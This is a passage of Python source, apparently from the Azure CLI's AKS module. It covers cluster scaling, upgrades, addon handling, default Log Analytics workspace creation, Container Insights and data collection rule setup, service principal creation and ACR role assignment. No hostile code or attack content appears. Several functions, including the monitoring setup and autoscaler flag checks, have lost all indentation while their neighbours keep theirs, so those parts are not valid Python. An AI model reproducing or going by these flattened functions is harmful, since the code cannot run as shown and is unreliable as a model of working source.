    else:
        display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
    """Display the diagnostics analysis report for a cluster."""
    colorama.init()
    # Fetch the cluster first so a missing cluster fails early.
    client.get(resource_group_name, name)
    _, kubeconfig_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name, name,
                        admin=True, path=kubeconfig_path)
    display_diagnostics_report(kubeconfig_path)
def aks_scale(cmd,   # pylint: disable=unused-argument
              client,
              resource_group_name,
              name,
              node_count,
              nodepool_name="",
              no_wait=False):
    """Change the node count of one node pool in a managed cluster."""
    instance = client.get(resource_group_name, name)
    pools = instance.agent_pool_profiles
    # With several pools, the caller must name the one to scale.
    if nodepool_name == "" and len(pools) > 1:
        raise CLIError('There are more than one node pool in the cluster. '
                       'Please specify nodepool name or use az aks nodepool command to scale node pool')
    for pool in pools:
        is_only_pool = nodepool_name == "" and len(pools) == 1
        if pool.name == nodepool_name or is_only_pool:
            if pool.enable_auto_scaling:
                raise CLIError(
                    "Cannot scale cluster autoscaler enabled node pool.")
            pool.count = int(node_count)  # pylint: disable=no-member
            # null out the SP and AAD profile because otherwise validation complains
            instance.service_principal_profile = None
            instance.aad_profile = None
            return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
    raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd,   # pylint: disable=unused-argument, too-many-return-statements
                client,
                resource_group_name,
                name,
                kubernetes_version='',
                control_plane_only=False,
                no_wait=False,
                node_image_only=False,
                aks_custom_headers=None,
                yes=False):
    """Upgrade a managed cluster to a newer Kubernetes version, or upgrade
    only the node images of every node pool.

    :param kubernetes_version: target version; '' keeps the current version.
    :param control_plane_only: upgrade only the control plane (unsupported on
        legacy clusters, which always upgrade node pools with the control plane).
    :param node_image_only: upgrade node images for every pool instead of the
        Kubernetes version; mutually exclusive with kubernetes_version.
    :param yes: skip all confirmation prompts.
    :returns: the create_or_update poller/result, or None if the user declines.
    :raises CLIError: on conflicting flags or unsupported cluster types.
    """
    from knack.prompting import prompt_y_n
    msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
    if not yes and not prompt_y_n(msg, default="n"):
        return None
    instance = client.get(resource_group_name, name)
    # Detect legacy AvailabilitySet-based clusters; they constrain what can be upgraded.
    vmas_cluster = False
    for agent_profile in instance.agent_pool_profiles:
        if agent_profile.type.lower() == "availabilityset":
            vmas_cluster = True
            break
    if kubernetes_version != '' and node_image_only:
        raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
                       'If you only want to upgrade the node version please use the "--node-image-only" option only.')
    if node_image_only:
        # BUGFIX: the original string concatenation was missing a space and
        # rendered as "...every node pool in the clusterand might take...".
        msg = "This node image upgrade operation will run across every node pool in the cluster " \
              "and might take a while, do you wish to continue?"
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        # This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
        # nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
        for agent_pool_profile in instance.agent_pool_profiles:
            if vmas_cluster:
                raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
                               'can only be applied on VirtualMachineScaleSets cluster.')
            agent_pool_client = cf_agent_pools(cmd.cli_ctx)
            _upgrade_single_nodepool_image_version(
                True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
        # Return the refreshed cluster after kicking off all pool upgrades.
        mc = client.get(resource_group_name, name)
        return _remove_nulls([mc])[0]
    if instance.kubernetes_version == kubernetes_version:
        if instance.provisioning_state == "Succeeded":
            logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
                           "will occur when upgrading to the same version if the cluster is not in a failed state.",
                           instance.kubernetes_version)
        elif instance.provisioning_state == "Failed":
            logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
                           "attempt resolution of failed cluster state.", instance.kubernetes_version)
    upgrade_all = False
    instance.kubernetes_version = kubernetes_version
    # for legacy clusters, we always upgrade node pools with CCP.
    if instance.max_agent_pools < 8 or vmas_cluster:
        if control_plane_only:
            msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
                   "upgraded to {} as well. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
        upgrade_all = True
    else:
        if not control_plane_only:
            msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
                   "AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            upgrade_all = True
        else:
            msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
                   "Node pool will not change. Continue?").format(instance.kubernetes_version)
            if not yes and not prompt_y_n(msg, default="n"):
                return None
    if upgrade_all:
        for agent_profile in instance.agent_pool_profiles:
            agent_profile.orchestrator_version = kubernetes_version
    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None
    headers = get_aks_custom_headers(aks_custom_headers)
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
    """Start a node-image-only upgrade for one agent pool, delegating to
    client.begin_upgrade_node_image_version via sdk_no_wait (returns the
    poller without waiting when no_wait is truthy)."""
    return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
def _handle_addons_args(cmd,   # pylint: disable=too-many-statements
                        addons_str,
                        subscription_id,
                        resource_group_name,
                        addon_profiles=None,
                        workspace_resource_id=None,
                        enable_msi_auth_for_monitoring=False,
                        appgw_name=None,
                        appgw_subnet_prefix=None,
                        appgw_subnet_cidr=None,
                        appgw_id=None,
                        appgw_subnet_id=None,
                        appgw_watch_namespace=None,
                        enable_sgxquotehelper=False,
                        aci_subnet_name=None,
                        vnet_subnet_id=None,
                        enable_secret_rotation=False):
    """Translate a comma-separated addon list into ManagedClusterAddonProfile
    entries, consuming the addon-specific arguments as each addon is handled.

    Each recognized addon name is removed from the working list; anything left
    over at the end is reported as unrecognized via CLIError. Existing entries
    in addon_profiles (when provided) are kept and extended.

    :param addons_str: comma-separated addon names, e.g. "monitoring,azure-policy".
    :returns: dict mapping addon profile names to ManagedClusterAddonProfile.
    :raises CLIError: for unrecognized addons or missing required arguments.
    """
    if not addon_profiles:
        addon_profiles = {}
    addons = addons_str.split(',') if addons_str else []
    if 'http_application_routing' in addons:
        addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('http_application_routing')
    if 'kube-dashboard' in addons:
        addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('kube-dashboard')
    # TODO: can we help the user find a workspace resource ID?
    if 'monitoring' in addons:
        if not workspace_resource_id:
            # use default workspace if exists else create default workspace
            workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                cmd, subscription_id, resource_group_name)
        workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
        addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
                                                                                 config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
                                                                                         CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
        addons.remove('monitoring')
    # --workspace-resource-id is only meaningful together with the monitoring addon
    elif workspace_resource_id:
        raise CLIError(
            '"--workspace-resource-id" requires "--enable-addons monitoring".')
    if 'azure-policy' in addons:
        addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('azure-policy')
    if 'gitops' in addons:
        addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
        addons.remove('gitops')
    if 'ingress-appgw' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        if appgw_name is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
        # NOTE: both --appgw-subnet-prefix and --appgw-subnet-cidr write the
        # same config key; the cidr value (handled second) wins if both are set.
        if appgw_subnet_prefix is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
        if appgw_subnet_cidr is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
        if appgw_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
        if appgw_subnet_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
        if appgw_watch_namespace is not None:
            addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
        addons.remove('ingress-appgw')
    if 'open-service-mesh' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
        addons.remove('open-service-mesh')
    if 'azure-keyvault-secrets-provider' in addons:
        # secret rotation defaults to off unless explicitly enabled
        addon_profile = ManagedClusterAddonProfile(
            enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
        if enable_secret_rotation:
            addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
        addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
        addons.remove('azure-keyvault-secrets-provider')
    if 'confcom' in addons:
        # SGX quote helper defaults to off unless explicitly enabled
        addon_profile = ManagedClusterAddonProfile(
            enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
        if enable_sgxquotehelper:
            addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
        addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
        addons.remove('confcom')
    if 'virtual-node' in addons:
        if not aci_subnet_name or not vnet_subnet_id:
            raise CLIError(
                '"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
        # TODO: how about aciConnectorwindows, what is its addon name?
        os_type = 'Linux'
        addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
            enabled=True,
            config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
        )
        addons.remove('virtual-node')
    # error out if any (unrecognized) addons remain
    if addons:
        raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
            ",".join(addons), "are" if len(addons) > 1 else "is"))
    return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
    """Return the resource ID of the default Log Analytics workspace for the
    monitoring addon, creating the default resource group and workspace when
    they do not exist yet.

    The default workspace lives in 'DefaultResourceGroup-<regionCode>' and is
    named 'DefaultWorkspace-<subscriptionId>-<regionCode>', where the region
    code is derived from the cluster resource group's location and the cloud.

    :raises CLIError: when the current cloud has no Log Analytics region mapping.
    """
    # mapping for azure public cloud
    # log analytics workspaces cannot be created in WCUS region due to capacity limits
    # so mapped to EUS per discussion with log analytics team
    AzureCloudLocationToOmsRegionCodeMap = {
        "australiasoutheast": "ASE",
        "australiaeast": "EAU",
        "australiacentral": "CAU",
        "canadacentral": "CCA",
        "centralindia": "CIN",
        "centralus": "CUS",
        "eastasia": "EA",
        "eastus": "EUS",
        "eastus2": "EUS2",
        "eastus2euap": "EAP",
        "francecentral": "PAR",
        "japaneast": "EJP",
        "koreacentral": "SE",
        "northeurope": "NEU",
        "southcentralus": "SCUS",
        "southeastasia": "SEA",
        "uksouth": "SUK",
        "usgovvirginia": "USGV",
        "westcentralus": "EUS",
        "westeurope": "WEU",
        "westus": "WUS",
        "westus2": "WUS2",
        "brazilsouth": "CQ",
        "brazilsoutheast": "BRSE",
        "norwayeast": "NOE",
        "southafricanorth": "JNB",
        "northcentralus": "NCUS",
        "uaenorth": "DXB",
        "germanywestcentral": "DEWC",
        "ukwest": "WUK",
        "switzerlandnorth": "CHN",
        "switzerlandwest": "CHW",
        "uaecentral": "AUH"
    }
    AzureCloudRegionToOmsRegionMap = {
        "australiacentral": "australiacentral",
        "australiacentral2": "australiacentral",
        "australiaeast": "australiaeast",
        "australiasoutheast": "australiasoutheast",
        "brazilsouth": "brazilsouth",
        "canadacentral": "canadacentral",
        "canadaeast": "canadacentral",
        "centralus": "centralus",
        "centralindia": "centralindia",
        "eastasia": "eastasia",
        "eastus": "eastus",
        "eastus2": "eastus2",
        "francecentral": "francecentral",
        "francesouth": "francecentral",
        "japaneast": "japaneast",
        "japanwest": "japaneast",
        "koreacentral": "koreacentral",
        "koreasouth": "koreacentral",
        "northcentralus": "northcentralus",
        "northeurope": "northeurope",
        "southafricanorth": "southafricanorth",
        "southafricawest": "southafricanorth",
        "southcentralus": "southcentralus",
        "southeastasia": "southeastasia",
        "southindia": "centralindia",
        "uksouth": "uksouth",
        "ukwest": "ukwest",
        "westcentralus": "eastus",
        "westeurope": "westeurope",
        "westindia": "centralindia",
        "westus": "westus",
        "westus2": "westus2",
        "norwayeast": "norwayeast",
        "norwaywest": "norwayeast",
        "switzerlandnorth": "switzerlandnorth",
        "switzerlandwest": "switzerlandwest",
        "uaenorth": "uaenorth",
        "germanywestcentral": "germanywestcentral",
        "germanynorth": "germanywestcentral",
        "uaecentral": "uaecentral",
        "eastus2euap": "eastus2euap",
        "brazilsoutheast": "brazilsoutheast"
    }
    # mapping for azure china cloud
    # log analytics only support China East2 region
    AzureChinaLocationToOmsRegionCodeMap = {
        "chinaeast": "EAST2",
        "chinaeast2": "EAST2",
        "chinanorth": "EAST2",
        "chinanorth2": "EAST2"
    }
    AzureChinaRegionToOmsRegionMap = {
        "chinaeast": "chinaeast2",
        "chinaeast2": "chinaeast2",
        "chinanorth": "chinaeast2",
        "chinanorth2": "chinaeast2"
    }
    # mapping for azure us government cloud
    AzureFairfaxLocationToOmsRegionCodeMap = {
        "usgovvirginia": "USGV",
        "usgovarizona": "PHX"
    }
    AzureFairfaxRegionToOmsRegionMap = {
        "usgovvirginia": "usgovvirginia",
        "usgovtexas": "usgovvirginia",
        "usgovarizona": "usgovarizona"
    }
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    cloud_name = cmd.cli_ctx.cloud.name
    if cloud_name.lower() == 'azurecloud':
        workspace_region = AzureCloudRegionToOmsRegionMap.get(
            rg_location, "eastus")
        workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
            workspace_region, "EUS")
    elif cloud_name.lower() == 'azurechinacloud':
        workspace_region = AzureChinaRegionToOmsRegionMap.get(
            rg_location, "chinaeast2")
        workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
            workspace_region, "EAST2")
    elif cloud_name.lower() == 'azureusgovernment':
        workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
            rg_location, "usgovvirginia")
        workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
            workspace_region, "USGV")
    else:
        logger.error(
            "AKS Monitoring addon not supported in cloud : %s", cloud_name)
        # BUGFIX: previously this branch only logged and fell through, crashing
        # below with UnboundLocalError on workspace_region_code; fail fast with
        # a clear error instead.
        raise CLIError(
            "AKS Monitoring addon not supported in cloud : {}".format(cloud_name))
    default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
    default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
        subscription_id, workspace_region_code)
    default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
        '/workspaces/{2}'.format(subscription_id,
                                 default_workspace_resource_group, default_workspace_name)
    resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    from azure.cli.core.profiles import ResourceType
    # check if default RG exists
    if resource_groups.check_existence(default_workspace_resource_group):
        from azure.core.exceptions import HttpResponseError
        try:
            resource = resources.get_by_id(
                default_workspace_resource_id, '2015-11-01-preview')
            return resource.id
        except HttpResponseError as ex:
            # 404 means the RG exists but the workspace doesn't: fall through
            # to create it below. Anything else is a real failure.
            if ex.status_code != 404:
                raise ex
    else:
        ResourceGroup = cmd.get_models('ResourceGroup', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
        resource_group = ResourceGroup(location=workspace_region)
        resource_groups.create_or_update(default_workspace_resource_group, resource_group)
    GenericResource = cmd.get_models('GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    generic_resource = GenericResource(location=workspace_region, properties={'sku': {'name': 'standalone'}})
    async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
                                                          generic_resource)
    # Poll in 15-second slices until the create operation completes.
    ws_resource_id = ''
    while True:
        result = async_poller.result(15)
        if async_poller.done():
            ws_resource_id = result.id
            break
    return ws_resource_id
def _sanitize_loganalytics_ws_resource_id(workspace_resource_id):
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
return workspace_resource_id
def _ensure_container_insights_for_monitoring(cmd,
addon,
cluster_subscription,
cluster_resource_group_name,
cluster_name,
cluster_region,
remove_monitoring=False,
aad_route=False,
create_dcr=False,
create_dcra=False):
"""
Either adds the ContainerInsights solution to a LA Workspace OR sets up a DCR (Data Collection Rule) and DCRA
(Data Collection Rule Association). Both let the monitoring addon send data to a Log Analytics Workspace.
Set aad_route == True to set up the DCR data route. Otherwise the solution route will be used. Create_dcr and
create_dcra have no effect if aad_route == False.
Set remove_monitoring to True and create_dcra to True to remove the DCRA from a cluster. The association makes
it very hard to delete either the DCR or cluster. (It is not obvious how to even navigate to the association from
the portal, and it prevents the cluster and DCR from being deleted individually).
"""
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
for key in list(addon.config):
if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip(
)
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
workspace_name = workspace_resource_id.split('/')[8]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
if not remove_monitoring:
resources = cf_resources(cmd.cli_ctx, subscription_id)
from azure.core.exceptions import HttpResponseError
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except HttpResponseError as ex:
raise ex
if aad_route:
cluster_resource_id = f"/subscriptions/{cluster_subscription}/resourceGroups/{cluster_resource_group_name}/providers/Microsoft.ContainerService/managedClusters/{cluster_name}"
dataCollectionRuleName = f"DCR-{workspace_name}"
dcr_resource_id = f"/subscriptions/{subscription_id}/resourceGroups/{resource_group}/providers/Microsoft.Insights/dataCollectionRules/{dataCollectionRuleName}"
from azure.cli.core.util import send_raw_request
from azure.cli.core.profiles import ResourceType
if create_dcr:
# first get the association between region display names and region IDs (because for some reason
# the "which RPs are available in which regions" check returns region display names)
region_names_to_id = {}
# retry the request up to two times
for _ in range(3):
try:
location_list_url = f"https://management.azure.com/subscriptions/{subscription_id}/locations?api-version=2019-11-01"
r = send_raw_request(cmd.cli_ctx, "GET", location_list_url)
# this is required to fool the static analyzer. The else statement will only run if an exception
# is thrown, but flake8 will complain that e is undefined if we don't also define it here.
error = None
break
except CLIError as e:
error = e
else:
# This will run if the above for loop was not broken out of. This means all three requests failed
raise error
json_response = json.loads(r.text)
for region_data in json_response["value"]:
region_names_to_id[region_data["displayName"]] = region_data["name"]
# check if region supports DCRs and DCR-A
for _ in range(3):
try:
feature_check_url = f"https://management.azure.com/subscriptions/{subscription_id}/providers/Microsoft.Insights?api-version=2020-10-01"
r = send_raw_request(cmd.cli_ctx, "GET", feature_check_url)
error = None
break
except CLIError as e:
error = e
else:
raise error
json_response = json.loads(r.text)
for resource in json_response["resourceTypes"]:
region_ids = map(lambda x: region_names_to_id[x], resource["locations"]) # map is lazy, so doing this for every region isn't slow
if resource["resourceType"].lower() == "datacollectionrules" and location not in region_ids:
raise ClientRequestError(f'Data Collection Rules are not supported for LA workspace region {location}')
elif resource["resourceType"].lower() == "datacollectionruleassociations" and cluster_region not in region_ids:
raise ClientRequestError(f'Data Collection Rule Associations are not supported for cluster region {location}')
# create the DCR
dcr_creation_body = json.dumps({"location": location,
"properties": {
"dataSources": {
"extensions": [
{
"name": "ContainerInsightsExtension",
"streams": [
"Microsoft-Perf",
"Microsoft-ContainerInventory",
"Microsoft-ContainerLog",
"Microsoft-ContainerLogV2",
"Microsoft-ContainerNodeInventory",
"Microsoft-KubeEvents",
"Microsoft-KubeHealth",
"Microsoft-KubeMonAgentEvents",
"Microsoft-KubeNodeInventory",
"Microsoft-KubePodInventory",
"Microsoft-KubePVInventory",
"Microsoft-KubeServices",
"Microsoft-InsightsMetrics"
],
"extensionName": "ContainerInsights"
}
]
},
"dataFlows": [
{
"streams": [
"Microsoft-Perf",
"Microsoft-ContainerInventory",
"Microsoft-ContainerLog",
"Microsoft-ContainerLogV2",
"Microsoft-ContainerNodeInventory",
"Microsoft-KubeEvents",
"Microsoft-KubeHealth",
"Microsoft-KubeMonAgentEvents",
"Microsoft-KubeNodeInventory",
"Microsoft-KubePodInventory",
"Microsoft-KubePVInventory",
"Microsoft-KubeServices",
"Microsoft-InsightsMetrics"
],
"destinations": [
"la-workspace"
]
}
],
"destinations": {
"logAnalytics": [
{
"workspaceResourceId": workspace_resource_id,
"name": "la-workspace"
}
]
}
}})
dcr_url = f"https://management.azure.com/{dcr_resource_id}?api-version=2019-11-01-preview"
for _ in range(3):
try:
send_raw_request(cmd.cli_ctx, "PUT", dcr_url, body=dcr_creation_body)
error = None
break
except CLIError as e:
error = e
else:
raise error
if create_dcra:
# only create or delete the association between the DCR and cluster
association_body = json.dumps({"location": cluster_region,
"properties": {
"dataCollectionRuleId": dcr_resource_id,
"description": "routes monitoring data to a Log Analytics workspace"
}})
association_url = f"https://management.azure.com/{cluster_resource_id}/providers/Microsoft.Insights/dataCollectionRuleAssociations/send-to-{workspace_name}?api-version=2019-11-01-preview"
for _ in range(3):
try:
send_raw_request(cmd.cli_ctx, "PUT" if not remove_monitoring else "DELETE", association_url, body=association_body)
error = None
break
except CLIError as e:
error = e
else:
raise error
else:
# legacy auth with LA workspace solution
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
                                  service_principal=None,
                                  client_secret=None,
                                  subscription_id=None,
                                  dns_name_prefix=None,
                                  fqdn_subdomain=None,
                                  location=None,
                                  name=None):
    """Return a usable service principal/secret pair for an AKS cluster.

    If the caller did not supply one, try the locally cached
    aksServicePrincipal.json first and only then create a fresh SPN.
    The chosen credentials are persisted back to the same cache file and
    re-read from it so repeated calls reuse identical credentials.
    """
    file_name_aks = 'aksServicePrincipal.json'
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if service_principal:
        # --service-principal supplied: its secret must come with it.
        if not client_secret:
            raise CLIError(
                '--client-secret is required if --service-principal is specified')
    else:
        # --service-principal not specified, try to load it from local disk
        principal_obj = load_acs_service_principal(
            subscription_id, file_name=file_name_aks)
        if principal_obj:
            service_principal = principal_obj.get('service_principal')
            client_secret = principal_obj.get('client_secret')
        else:
            # Nothing cached: mint a brand new service principal.
            if not client_secret:
                client_secret = _create_client_secret()
            salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
            # The homepage URL only needs to be unique; salt it to avoid clashes.
            subdomain = dns_name_prefix if dns_name_prefix else fqdn_subdomain
            url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
                salt, subdomain, location)
            service_principal = _build_service_principal(
                rbac_client, cli_ctx, name, url, client_secret)
            if not service_principal:
                raise CLIError('Could not create a service principal with the right permissions. '
                               'Are you an Owner on this project?')
            logger.info('Created a service principal: %s', service_principal)
            # We don't need to add role assignment for this created SPN
    store_acs_service_principal(
        subscription_id, client_secret, service_principal, file_name=file_name_aks)
    return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
    """Return the Azure location of a resource group.

    The GET call doubles as an existence check: it raises if the group
    does not exist.
    """
    groups_client = cf_resource_groups(ctx, subscription_id=subscription_id)
    return groups_client.get(resource_group_name).location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
                    client_id,
                    acr_name_or_id,
                    subscription_id,  # pylint: disable=unused-argument
                    detach=False):
    """Grant (or with detach=True, revoke) pull access on an ACR for client_id.

    acr_name_or_id may be either a full ARM resource ID or a bare registry
    name; a bare name is resolved across all resource groups.
    """
    from msrestazure.tools import is_valid_resource_id, parse_resource_id
    if is_valid_resource_id(acr_name_or_id):
        # Full resource ID given: look the registry up directly.
        try:
            parsed = parse_resource_id(acr_name_or_id)
            acr_client = cf_container_registry_service(
                cli_ctx, subscription_id=parsed['subscription'])
            registry = acr_client.registries.get(
                parsed['resource_group'], parsed['name'])
        except CloudError as ex:
            raise CLIError(ex.message)
    else:
        # Check if the ACR exists by name accross all resource groups.
        registry_name = acr_name_or_id
        registry_resource = 'Microsoft.ContainerRegistry/registries'
        try:
            registry = get_resource_by_name(
                cli_ctx, registry_name, registry_resource)
        except CloudError as ex:
            if 'was not found' in ex.message:
                raise CLIError(
                    "ACR {} not found. Have you provided the right ACR name?".format(registry_name))
            raise CLIError(ex.message)
    _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
def _ensure_aks_acr_role_assignment(cli_ctx,
                                    client_id,
                                    registry_id,
                                    detach=False):
    """Create (or with detach=True, delete) the 'acrpull' role assignment
    that lets client_id pull images from the registry scope."""
    if detach:
        removed = _delete_role_assignments(cli_ctx,
                                           'acrpull',
                                           client_id,
                                           scope=registry_id)
        if not removed:
            raise CLIError('Could not delete role assignments for ACR. '
                           'Are you an Owner on this subscription?')
        return
    added = _add_role_assignment(cli_ctx,
                                 'acrpull',
                                 client_id,
                                 scope=registry_id)
    if not added:
        raise CLIError('Could not create a role assignment for ACR. '
                       'Are you an Owner on this subscription?')
